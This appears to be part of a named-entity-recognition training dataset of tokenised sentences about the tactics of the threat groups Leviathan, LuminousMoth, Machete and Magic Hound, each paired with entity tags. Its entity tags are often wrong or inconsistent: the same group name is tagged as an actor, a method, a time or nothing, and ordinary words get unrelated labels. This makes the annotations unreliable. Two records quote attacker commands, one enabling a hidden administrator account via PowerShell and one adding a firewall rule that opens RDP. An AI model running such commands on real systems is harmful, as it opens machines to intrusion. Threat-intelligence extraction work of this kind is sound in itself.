[ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "established", - "domains", - "that", - "impersonate", - "legitimate", - "entities", - "to", - "use", - "for", - "targeting", - "efforts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "infected", - "victims", - "using", - "watering", - "holes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "utilized", - "OLE", - "as", - "a", - "method", - "to", - "insert", - "malicious", - "content", - "inside", - "various", - "phishing", - "documents." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "utilized", - "techniques", - "like", - "reflective", - "DLL", - "loading", - "to", - "write", - "a", - "DLL", - "into", - "memory", - "and", - "load", - "a", - "shell", - "that", - "provides", - "backdoor", - "access", - "to", - "the", - "victim." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-Way", - "O", - "O", - "O", - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "compromised", - "email", - "accounts", - "to", - "conduct", - "social", - "engineering", - "attacks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "I-OffAct", - "I-OffAct", - "O" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "created", - "new", - "email", - "accounts", - "for", - "targeting", - "efforts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "obfuscated", - "code", - "using", - "base64", - "and", - "gzip", - "compression." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "exfiltrated", - "data", - "over", - "its", - "C2", - "channel." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "used", - "an", - "uploader", - "known", - "as", - "LUNCHMONEY", - "that", - "can", - "exfiltrate", - "files", - "to", - "Dropbox." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-SamFile", - "B-Purp", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "exploited", - "multiple", - "Microsoft", - "Office", - "and", - ".NET", - "vulnerabilities", - "for", - "execution,", - "including", - "CVE-2017-0199,", - "CVE-2017-8759,", - "and", - "CVE-2017-11882." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Exp", - "I-Exp", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Features", - "B-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "used", - "external", - "remote", - "services", - "such", - "as", - "virtual", - "private", - "networks", - "(VPN)", - "to", - "gain", - "initial", - "access." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "downloaded", - "additional", - "scripts", - "and", - "files", - "from", - "adversary-controlled", - "servers." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-OffAct", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "conducted", - "internal", - "spearphishing", - "within", - "the", - "victim's", - "environment", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "used", - "publicly", - "available", - "tools", - "to", - "dump", - "password", - "hashes,", - "including", - "ProcDump", - "and", - "WCE." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "used", - "C:\\Windows\\Debug", - "and", - "C:\\Perflogs", - "as", - "staging", - "directories." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "sent", - "spearphishing", - "attachments", - "attempting", - "to", - "get", - "a", - "user", - "to", - "click." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "sent", - "spearphishing", - "email", - "links", - "attempting", - "to", - "get", - "a", - "user", - "to", - "click." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "used", - "multi-hop", - "proxies", - "to", - "disguise", - "the", - "source", - "of", - "their", - "malicious", - "traffic." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "used", - "publicly", - "available", - "tools", - "to", - "dump", - "password", - "hashes,", - "including", - "HOMEFRY." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "received", - "C2", - "instructions", - "from", - "user", - "profiles", - "created", - "on", - "legitimate", - "websites", - "such", - "as", - "Github", - "and", - "TechNet." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "used", - "PowerShell", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "used", - "protocol", - "tunneling", - "to", - "further", - "conceal", - "C2", - "communications", - "and", - "infrastructure." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "used", - "JavaScript", - "to", - "create", - "a", - "shortcut", - "file", - "in", - "the", - "Startup", - "folder", - "that", - "points", - "to", - "its", - "main", - "backdoor." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "used", - "regsvr32", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "staged", - "data", - "remotely", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "targeted", - "RDP", - "credentials", - "and", - "used", - "it", - "to", - "move", - "through", - "the", - "victim", - "environment." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Leviathan", - "used", - "ssh", - "for", - "internal", - "reconnaissance." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "used", - "JavaScript", - "to", - "create", - "a", - "shortcut", - "file", - "in", - "the", - "Startup", - "folder", - "that", - "points", - "to", - "its", - "main", - "backdoor." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "compromised", - "social", - "media", - "accounts", - "to", - "conduct", - "social", - "engineering", - "attacks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Idus", - "I-Idus", - "O", - "O", - "O", - "I-OffAct", - "I-OffAct", - "O" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "created", - "new", - "social", - "media", - "accounts", - "for", - "targeting", - "efforts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Idus", - "I-Idus", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "sent", - "spearphishing", - "emails", - "with", - "malicious", - "attachments,", - "including", - ".rtf,", - ".doc,", - "and", - ".xls", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "sent", - "spearphishing", - "emails", - "with", - "links,", - "often", - "using", - "a", - "fraudulent", - "lookalike", - "domain", - "and", - "stolen", - "branding." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "used", - "steganography", - "to", - "hide", - "stolen", - "data", - "inside", - "other", - "files", - "stored", - "on", - "Github." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "obtained", - "valid", - "accounts", - "to", - "gain", - "initial", - "access." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "used", - "VBScript." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Leviathan", - "relies", - "on", - "web", - "shells", - "for", - "an", - "initial", - "foothold", - "as", - "well", - "as", - "persistence", - "into", - "the", - "victim's", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "used", - "WMI", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "used", - "WMI", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "LuminousMoth", - "has", - "used", - "ARP", - "spoofing", - "to", - "redirect", - "a", - "compromised", - "machine", - "to", - "an", - "actor-controlled", - "website." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LuminousMoth", - "has", - "manually", - "archived", - "stolen", - "files", - "from", - "victim", - "machines", - "before", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LuminousMoth", - "has", - "signed", - "their", - "malware", - "with", - "a", - "valid", - "digital", - "signature." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LuminousMoth", - "has", - "used", - "legitimate", - "executables", - "such", - "as", - "`winword.exe`", - "and", - "`igfxem.exe`", - "to", - "side-load", - "their", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LuminousMoth", - "has", - "split", - "archived", - "files", - "into", - "multiple", - "parts", - "to", - "bypass", - "a", - "5MB", - "limit." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LuminousMoth", - "has", - "collected", - "files", - "and", - "data", - "from", - "compromised", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LuminousMoth", - "has", - "used", - "a", - "valid", - "digital", - "certificate", - "for", - "some", - "of", - "their", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LuminousMoth", - "has", - "redirected", - "compromised", - "machines", - "to", - "an", - "actor-controlled", - "webpage", - "through", - "HTML", - "injection." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "LuminousMoth", - "has", - "used", - "malware", - "that", - "exfiltrates", - "stolen", - "data", - "to", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LuminousMoth", - "has", - "exfiltrated", - "data", - "to", - "Google", - "Drive." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LuminousMoth", - "has", - "used", - "malware", - "that", - "scans", - "for", - "files", - "in", - "the", - "Documents,", - "Desktop,", - "and", - "Download", - "folders", - "and", - "in", - "other", - "drives." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LuminousMoth", - "has", - "used", - "malware", - "to", - "store", - "malicious", - "binaries", - "in", - "hidden", - "directories", - "on", - "victim's", - "USB", - "drives." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LuminousMoth", - "has", - "downloaded", - "additional", - "malware", - "and", - "tools", - "onto", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LuminousMoth", - "has", - "created", - "a", - "link", - "to", - "a", - "Dropbox", - "file", - "that", - "has", - "been", - "used", - "in", - "their", - "spear-phishing", - "operations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "LuminousMoth", - "has", - "lured", - "victims", - "into", - "clicking", - "malicious", - "Dropbox", - "download", - "links", - "delivered", - "through", - "spearphishing." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "LuminousMoth", - "has", - "used", - "unique", - "malware", - "for", - "information", - "theft", - "and", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "B-Purp" - ] - }, - { - "tokens": [ - "LuminousMoth", - "has", - "obtained", - "and", - "used", - "malware", - "such", - "as", - "Cobalt", - "Strike." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "LuminousMoth", - "has", - "disguised", - "their", - "exfiltration", - "malware", - "as", - "`ZoomVideoApp.exe`." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "LuminousMoth", - "has", - "used", - "malware", - "that", - "adds", - "Registry", - "keys", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "LuminousMoth", - "has", - "used", - "malicious", - "DLLs", - "that", - "setup", - "persistence", - "in", - "the", - "Registry", - "Key", - "`HKCU\\Software\\Microsoft\\Windows\\Current", - "Version\\Run`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LuminousMoth", - "has", - "used", - "malicious", - "DLLs", - "to", - "spread", - "malware", - "to", - "connected", - "removable", - "USB", - "drives", - "on", - "infected", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LuminousMoth", - "has", - "created", - "scheduled", - "tasks", - "to", - "establish", - "persistence", - "for", - "their", - "tools." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LuminousMoth", - "has", - "sent", - "spearphishing", - "emails", - "containing", - "a", - "malicious", - "Dropbox", - "download", - "link." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LuminousMoth", - "has", - "used", - "an", - "unnamed", - "post-exploitation", - "tool", - "to", - "steal", - "cookies", - "from", - "the", - "Chrome", - "browser." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LuminousMoth", - "has", - "used", - "a", - "malicious", - "DLL", - "to", - "collect", - "the", - "username", - "from", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LuminousMoth", - "has", - "obtained", - "an", - "ARP", - "spoofing", - "tool", - "from", - "GitHub." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "LuminousMoth", - "has", - "hosted", - "malicious", - "payloads", - "on", - "Dropbox." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "LuminousMoth", - "has", - "used", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "has", - "distributed", - "Machete", - "through", - "a", - "fake", - "blog", - "website." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "has", - "relied", - "on", - "users", - "opening", - "malicious", - "attachments", - "delivered", - "through", - "spearphishing", - "to", - "execute", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-SecTeam", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "has", - "has", - "relied", - "on", - "users", - "opening", - "malicious", - "links", - "delivered", - "through", - "spearphishing", - "to", - "execute", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete's", - "Machete", - "MSI", - "installer", - "has", - "masqueraded", - "as", - "a", - "legitimate", - "Adobe", - "Acrobat", - "Reader", - "installer." - ], - "ner_tags": [ - "B-Idus", - "B-Idus", - "O", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "Machete", - "has", - "used", - "msiexec", - "to", - "install", - "the", - "Machete", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Idus", - "O" - ] - }, - { - "tokens": [ - "Machete", - "used", - "multiple", - "compiled", - "Python", - "scripts", - "on", - "the", - "victim’s", - "system.", - "Machete's", - "main", - "backdoor", - "Machete", - "is", - "also", - "written", - "in", - "Python." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "has", - "created", - "scheduled", - "tasks", - "to", - "maintain", - "Machete's", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O" - ] - }, - { - "tokens": [ - "Machete", - "has", - "delivered", - "spearphishing", - "emails", - "that", - "contain", - "a", - "zipped", - "file", - "with", - "malicious", - "contents." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "has", - "sent", - "phishing", - "emails", - "that", - "contain", - "a", - "link", - "to", - "an", - "external", - "server", - "with", - "ZIP", - "and", - "RAR", - "archives." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "has", - "embedded", - "malicious", - "macros", - "within", - "spearphishing", - "attachments", - "to", - "download", - "additional", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "has", - "used", - "batch", - "files", - "to", - "initiate", - "additional", - "downloads", - "of", - "malicious", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "added", - "a", - "user", - "named", - "DefaultAccount", - "to", - "the", - "Administrators", - "and", - "Remote", - "Desktop", - "Users", - "groups." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Org", - "B-Purp", - "I-Org", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "granted", - "compromised", - "email", - "accounts", - "read", - "access", - "to", - "the", - "email", - "boxes", - "of", - "additional", - "targeted", - "accounts.", - "The", - "group", - "then", - "was", - "able", - "to", - "authenticate", - "to", - "the", - "intended", - "victim's", - "OWA", - "(Outlook", - "Web", - "Access)", - "portal", - "and", - "read", - "hundreds", - "of", - "email", - "communications", - "for", - "information", - "on", - "Middle", - "East", - "organizations." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Idus", - "I-Idus", - "O", - "O", - "O", - "I-Area", - "I-Area", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "malware", - "has", - "used", - "IRC", - "for", - "C2." - ], - "ner_tags": [ - "O", - "O", - "B-Tool", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "used", - "gzip", - "to", - "archive", - "dumped", - "LSASS", - "process", - "memory", - "and", - "RAR", - "to", - "stage", - "and", - "compress", - "local", - "folders." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "malware", - "can", - "use", - "a", - "SOAP", - "Web", - "service", - "to", - "communicate", - "with", - "its", - "C2", - "server." - ], - "ner_tags": [ - "O", - "O", - "B-SecTeam", - "O", - "O", - "O", - "B-Way", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "removed", - "mailbox", - "export", - "requests", - "from", - "compromised", - "Exchange", - "servers." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "used", - "base64-encoded", - "commands." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "gathered", - "credentials", - "from", - "two", - "victims", - "that", - "they", - "then", - "attempted", - "to", - "validate", - "across", - "75", - "different", - "websites.", - "Magic", - "Hound", - "has", - "also", - "collected", - "credentials", - "from", - "over", - "900", - "Fortinet", - "VPN", - "servers", - "in", - "the", - "US,", - "Europe,", - "and", - "Israel." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Area", - "B-Area", - "O", - "B-Area" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "used", - "BitLocker", - "and", - "DiskCryptor", - "to", - "encrypt", - "targeted", - "workstations." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "used", - "a", - "web", - "shell", - "to", - "exfiltrate", - "a", - "ZIP", - "file", - "containing", - "a", - "dump", - "of", - "LSASS", - "memory", - "on", - "a", - "compromised", - "machine." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "B-Way", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "enabled", - "and", - "used", - "the", - "default", - "system", - "managed", - "account,", - "DefaultAccount,", - "via", - "`\"powershell.exe\"", - "/c", - "net", - "user", - "DefaultAccount", - "/active:yes`", - "to", - "connect", - "to", - "a", - "targeted", - "Exchange", - "server", - "over", - "RDP." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "collected", - "location", - "information", - "from", - "visitors", - "to", - "their", - "phishing", - "sites." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "executed", - "scripts", - "to", - "disable", - "the", - "event", - "log", - "service." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "added", - "the", - "following", - "rule", - "to", - "a", - "victim's", - "Windows", - "firewall", - "to", - "allow", - "RDP", - "traffic", - "-", - "`\"netsh\"", - "advfirewall", - "firewall", - "add", - "rule", - "name=\"Terminal", - "Server\"", - "dir=in", - "action=allow", - "protocol=TCP", - "localport=3389`." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "disabled", - "antivirus", - "services", - "on", - "targeted", - "systems", - "in", - "order", - "to", - "upload", - "malicious", - "payloads." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "Magic", - "Hound", - "has", - "used", - "domain", - "administrator", - "accounts", - "after", - "dumping", - "LSASS", - "process", - "memory." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - 